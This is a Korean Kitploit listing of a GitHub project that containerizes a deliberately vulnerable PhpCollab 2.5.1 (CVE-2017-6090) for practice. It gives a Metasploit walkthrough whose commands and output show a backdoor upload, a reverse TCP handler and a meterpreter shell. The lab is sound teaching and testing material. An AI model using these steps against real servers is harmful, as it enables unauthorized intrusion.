Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
exploit-CVE-2017-6090 — 컨테이너화된 익스플로잇 가능한 PhpCollab | Kitploit
도구/GitHubGitHub/jlk/exploit-cve-2017-6090
Container SecurityExploit FrameworksVulnerability AnalysisWeb Application ExploitationPenetration TestingLearning & Education
GitHubjlk/exploit-cve-2017-6090

exploit-CVE-2017-6090

컨테이너화된 익스플로잇 가능한 PhpCollab

저장소 보기
158년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

컨테이너화된 CVE-2017-6090 취약점

Docker Pulls License

이 프로젝트는 CVE-2017-6090에 명시된 원격 코드 실행 취약점을 포함하는 PhpCollab 2.5.1을 실행하는 컨테이너를 빌드합니다. 추가로, 데모를 위해 해당 컨테이너와 mysql을 시작하는 docker-compse 파일이 있으며, 악용 방법은 아래에 있습니다.

빌드

docker build -t 컨테이너이름 . 또는 jlkinsel/exploit-cve-2017-6090 이미지를 사용하세요.

실행 및 구성

이것을 실행하는 가장 쉬운 방법은 포함된 docker-compose.yml 파일을 사용하는 것입니다. 나중에 시간이 나거나 관심을 보이는 사람이 있으면 kubernetes 배포 또는 helm 차트를 만들겠습니다.

따라서, 시작하려면:

root@kitploit:~
docker-compose up

지금까지는 잘 되었습니다! 이제 phpcollab이 데이터베이스를 사용하도록 구성되고 기본 관리자 비밀번호가 설정되어야 합니다. 잠시 자동화를 시도해봤지만...음...브라우저 사용법은 아시는 것 같군요...

  • http://localhost:8088 로 이동
  • GPL 하단으로 스크롤하여 "Offline installation" 상자를 클릭한 다음 Step 2를 클릭하세요.
  • 다음 데이터를 필드에 입력한 후 저장을 클릭하세요:

마지막으로, 로그인하여 둘러볼 수 있지만 악용에는 필요하지 않습니다.

참고

이 docker 구성은 스토리지에 대해 특별한 처리를 하지 않습니다. mysql 데이터베이스를 영구 저장하려면 docker-compose.yml의 mysql 서비스 정의에 볼륨 정의를 추가해야 합니다. 예제는 mariadb docker hub 페이지 를 참조하세요.

악용

먼저 - 위의 실행 및 구성을 따라 애플리케이션을 시작하고 실행하세요.

이 프로젝트에 악용 코드를 추가하지 않았습니다. 왜냐하면, 음, Metasploit이 있기 때문입니다.

MSF가 처음이신가요? 방금 시작한 컨테이너를 악용하는 빠른 개요입니다:

root@kitploit:~
docker run -ti --network exploitcve20176090_default remnux/metasploit

시작하는 데 몇 분 정도 걸립니다. remnux/metasploit docker hub 페이지에서 볼륨 사용에 대해 다루므로 앞으로는 시간이 덜 걸릴 것입니다. 하지만 지금은 바로 시작합니다!

셸 프롬프트가 나타나면 계속 진행하겠습니다:

root@kitploit:~
# msfconsole
msf5 > use exploit/unix/webapp/phpcollab_upload_exec
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGET 0
TARGET => 0
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RHOST phpcollab
RHOST => phpcollab
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RPORT 80
RPORT => 80
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGETURI /
TARGETURI => /
msf5 exploit(unix/webapp/phpcollab_upload_exec) > exploit

[*] Started reverse TCP handler on 172.31.0.4:4444
[*] Uploading backdoor file: 1.wGvfKLDyWHL.php
[+] Backdoor successfully created.
[*] Triggering the exploit...
[*] Sending stage (37543 bytes) to 172.31.0.2
[+] Deleted 1.wGvfKLDyWHL.php

meterpreter >

이 시점에서 침입에 성공했으며, 게임을 시작할 수 있습니다.

참고

이 디렉토리의 이름이 'exploit-CVE-2017-6090'이 아닌 경우 위의 --network 명령을 변경해야 합니다.

또한 - 네, msfconsole에서 원격 포트를 80으로 설정했지만, 비록 외부에서는 8088입니다. metasploit 컨테이너는 phpcollab 컨테이너와 동일한 네트워크에 있습니다.

도구 다운로드
필드값
Database servermysql
Database loginphpcollab
Database passwordchangeme
Database namephpcollab
NotificationsFalse
Admin passwordchangeme (원하는 대로 설정)